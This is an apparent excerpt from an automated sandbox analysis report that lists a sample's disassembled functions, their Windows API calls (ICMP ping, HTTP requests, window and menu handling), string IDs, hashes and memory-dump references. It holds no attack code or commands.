                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                      • String ID: @U=u$U
                                                                                                                      • API String ID: 4009187628-4110099822
                                                                                                                      • Opcode ID: 3ab2b59b30c5ca17b8a87e4c31f382e3db15ea4d2f8555e3dc5bc7f1e60a8504
                                                                                                                      • Instruction ID: 09c4a6ffb65ae7cbb86944c96faf149d5768ee8e2f0b1a58f8bea6b37787d7bb
                                                                                                                      • Opcode Fuzzy Hash: 3ab2b59b30c5ca17b8a87e4c31f382e3db15ea4d2f8555e3dc5bc7f1e60a8504
                                                                                                                      • Instruction Fuzzy Hash: E7710335900208DFCF328F64CC80AEA7BB5FF49314F18422AFE555A2A6C7358C82DB65
                                                                                                                      Function 003F8694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WS2_32(00000101,?), ref: 003F86F5
                                                                                                                      • inet_addr.WS2_32(?), ref: 003F873A
                                                                                                                      • gethostbyname.WS2_32(?), ref: 003F8746
                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 003F8754
                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003F87C4
                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003F87DA
                                                                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003F884F
                                                                                                                      • WSACleanup.WS2_32 ref: 003F8855
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                      • String ID: Ping
                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                      • Opcode ID: 9cef43c012daa500f17005d83b9e7d421e2b82b84f4bc0dca18cf0af02797194
                                                                                                                      • Instruction ID: 2c1b3c5813fae1a30b345902cc188b4003bf1e7ba0bd567e9f4ccbf6cdac25b8
                                                                                                                      • Opcode Fuzzy Hash: 9cef43c012daa500f17005d83b9e7d421e2b82b84f4bc0dca18cf0af02797194
                                                                                                                      • Instruction Fuzzy Hash: 0A51B1316046049FD726EF21CC85B7ABBE4EF48764F14892AFA56DB2A1DB74EC01CB41
                                                                                                                      Function 00409C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00409C68
                                                                                                                      • CreateMenu.USER32 ref: 00409C83
                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00409C92
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00409D1F
                                                                                                                      • IsMenu.USER32(?), ref: 00409D35
                                                                                                                      • CreatePopupMenu.USER32 ref: 00409D3F
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00409D70
                                                                                                                      • DrawMenuBar.USER32 ref: 00409D7E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 176399719-4108050209
                                                                                                                      • Opcode ID: 0cc25bed06a1547007c5fbd6b112b1278ab9bdb1d3cf70ff9b22576315495c0a
                                                                                                                      • Instruction ID: 3e6497d8d6dddc78eba5200c89a35d53f2c51f22c92d7898b6c136c3088238e0
                                                                                                                      • Opcode Fuzzy Hash: 0cc25bed06a1547007c5fbd6b112b1278ab9bdb1d3cf70ff9b22576315495c0a
                                                                                                                      • Instruction Fuzzy Hash: E5416875A00209EFDB20EF64D884BDABBB5FF49344F140029E945A73A2D774AD10CFA8
                                                                                                                      Function 003EEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 003EEC1E
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003EEC94
                                                                                                                      • GetLastError.KERNEL32 ref: 003EEC9E
                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 003EED0B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                      • Opcode ID: 433eef91ddcb37203dc58bb4d441ae5756b743e4d18c3033bbb3c1c88fcbbc2e
                                                                                                                      • Instruction ID: 97ebb3f7fcf89112c14239d4103469a56574dff1c0465e5ecb7807347acbe27c
                                                                                                                      • Opcode Fuzzy Hash: 433eef91ddcb37203dc58bb4d441ae5756b743e4d18c3033bbb3c1c88fcbbc2e
                                                                                                                      • Instruction Fuzzy Hash: FA31D236A00255DFC712EF65C845ABEB7B4FF44741F204226F906EB2D1DB709942CB81
                                                                                                                      Function 00408CDB Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00408CF3
                                                                                                                      • GetDC.USER32(00000000), ref: 00408CFB
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00408D06
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00408D12
                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00408D4E
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00408D5F
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0040BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00408D99
                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00408DB9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3864802216-2594219639
                                                                                                                      • Opcode ID: ba617459ee593e3648349c5b1db24298fc0c72f09f7dd82660c2a3b6c49d1f87
                                                                                                                      • Instruction ID: 7c41db4165f85dcc62069b542983e08d6d85d46ceb789a5217021d0d30b7dca1
                                                                                                                      • Opcode Fuzzy Hash: ba617459ee593e3648349c5b1db24298fc0c72f09f7dd82660c2a3b6c49d1f87
                                                                                                                      • Instruction Fuzzy Hash: FA318F72600110BBEB208F50CD49FEB3BA9EF49715F044165FE48EA291CA799841CB78
                                                                                                                      Function 003EB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 003EB137
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafeVartype
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1725837607-0
                                                                                                                      • Opcode ID: 8123217ce538615c3fa214102aa7186f6ae17497900cb64472604de684ef34f5
                                                                                                                      • Instruction ID: 0f6879769171f7aa57e3d8cbc79bb26bef44a9bd102d37d1c1b54f8b854f683f
                                                                                                                      • Opcode Fuzzy Hash: 8123217ce538615c3fa214102aa7186f6ae17497900cb64472604de684ef34f5
                                                                                                                      • Instruction Fuzzy Hash: 43C19D79A0026ADFDB06DF99D481BAFB7F4FF09315F24416AE605EB291C730A941CB90
                                                                                                                      Function 003CBA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 003CBA74
                                                                                                                        • Part of subcall function 003C8984: __mtinitlocknum.LIBCMT ref: 003C8996
                                                                                                                        • Part of subcall function 003C8984: RtlEnterCriticalSection.NTDLL(003C0127), ref: 003C89AF
                                                                                                                      • __calloc_crt.LIBCMT ref: 003CBA85
                                                                                                                        • Part of subcall function 003C7616: __calloc_impl.LIBCMT ref: 003C7625
                                                                                                                        • Part of subcall function 003C7616: Sleep.KERNEL32(00000000,?,003C0127,?,003A125D,00000058,?,?), ref: 003C763C
                                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 003CBAA0
                                                                                                                      • GetStartupInfoW.KERNEL32(?,00456990,00000064,003C6B14,004567D8,00000014), ref: 003CBAF9
                                                                                                                      • __calloc_crt.LIBCMT ref: 003CBB44
                                                                                                                      • GetFileType.KERNEL32(00000001), ref: 003CBB8B
                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 003CBBC4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1426640281-0
                                                                                                                      • Opcode ID: bdaad2c5ab2801d0e1fdefbad9fe34d673946fe1aa8a410478886ba1bce44e4e
                                                                                                                      • Instruction ID: e542910a269891145f037d3baa9591a3d8be87bc16827580b243e67313b2ca50
                                                                                                                      • Opcode Fuzzy Hash: bdaad2c5ab2801d0e1fdefbad9fe34d673946fe1aa8a410478886ba1bce44e4e
                                                                                                                      • Instruction Fuzzy Hash: CF81B1709047458FCB25CF68C885BAABBB4AF49324F24826DD4A6EB3D1DB749C03CB55
                                                                                                                      Function 003E4A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 003E4A7D
                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4A91
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 003E4A98
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4AA7
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 003E4AB9
                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4AD2
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4AE4
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4B29
                                                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4B3E
                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4B49
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2156557900-0
                                                                                                                      • Opcode ID: dfb386d4716e2a916020838ee151ea3037f47acb17384fd2d07f6123e61d0403
                                                                                                                      • Instruction ID: bf0f811c84c5765dc8bce45b583e927f1f55e32f00478bd76d802cef9a50fde5
                                                                                                                      • Opcode Fuzzy Hash: dfb386d4716e2a916020838ee151ea3037f47acb17384fd2d07f6123e61d0403
                                                                                                                      • Instruction Fuzzy Hash: B031E471B00291BFDB229F16EC88B6A77ADEB48312F114125F904C71D0E3F5ED418B69
                                                                                                                      Function 003DD978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnumChildWindows.USER32(?,003DDD46), ref: 003DDC86
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ChildEnumWindows
                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                      • API String ID: 3555792229-1603158881
                                                                                                                      • Opcode ID: 15441a1eb9dafb457e4fe401d447afa5c287a829918d1c8840c83e51e1e2fcc7
                                                                                                                      • Instruction ID: 423bc76f5b70f2d434ccda9f3d7b5133480c04e862df8549175093eaa11ed974
                                                                                                                      • Opcode Fuzzy Hash: 15441a1eb9dafb457e4fe401d447afa5c287a829918d1c8840c83e51e1e2fcc7
                                                                                                                      • Instruction Fuzzy Hash: 4591F432A00506ABCB0ADF64D881BEDFB75FF05314F15811BE94AAB251DF707959CB90
                                                                                                                      Function 003A45A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003A45F0
                                                                                                                      • CoUninitialize.COMBASE ref: 003A4695
                                                                                                                      • UnregisterHotKey.USER32(?), ref: 003A47BD
                                                                                                                      • DestroyWindow.USER32(?), ref: 00415936
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0041599D
                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004159CA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                      • String ID: close all
                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                      • Opcode ID: cad0af98eb603f5b5145842d00a471a4b80f67509ffc6bbe0647b3951ac5cb98
                                                                                                                      • Instruction ID: 2566e105406963d4793cb4fc80089086d4a8efac202c093ef3fc1a7693fc924f
                                                                                                                      • Opcode Fuzzy Hash: cad0af98eb603f5b5145842d00a471a4b80f67509ffc6bbe0647b3951ac5cb98
                                                                                                                      • Instruction Fuzzy Hash: DA915B74710602CFC71AEF28C895FA9F3A4FF56310F5042A9E40AAB662DB74AD56CF04
                                                                                                                      Function 00409882 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 142windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00409926
                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 0040993A
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00409954
                                                                                                                      • _wcscat.LIBCMT ref: 004099AF
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 004099C6
                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004099F4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window_wcscat
                                                                                                                      • String ID: @U=u$SysListView32
                                                                                                                      • API String ID: 307300125-1908207174
                                                                                                                      • Opcode ID: 3738ab9c7482ed692b19e0011e069976a7bcfe0fb74686b468c13705a5d49142
                                                                                                                      • Instruction ID: 4175b53a17b8637f582902c4319487cd1f8d12a383893703787abc48f404eff0
                                                                                                                      • Opcode Fuzzy Hash: 3738ab9c7482ed692b19e0011e069976a7bcfe0fb74686b468c13705a5d49142
                                                                                                                      • Instruction Fuzzy Hash: 8441A371A00308ABEB219F64CC85FEE77A8EF48354F10442BF585A72D2D6799D848B58
                                                                                                                      Function 003F4C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003F4C5E
                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003F4C8A
                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003F4CCC
                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003F4CE1
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003F4CEE
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003F4D1E
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003F4D65
                                                                                                                        • Part of subcall function 003F56A9: GetLastError.KERNEL32(?,?,003F4A2B,00000000,00000000,00000001), ref: 003F56BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
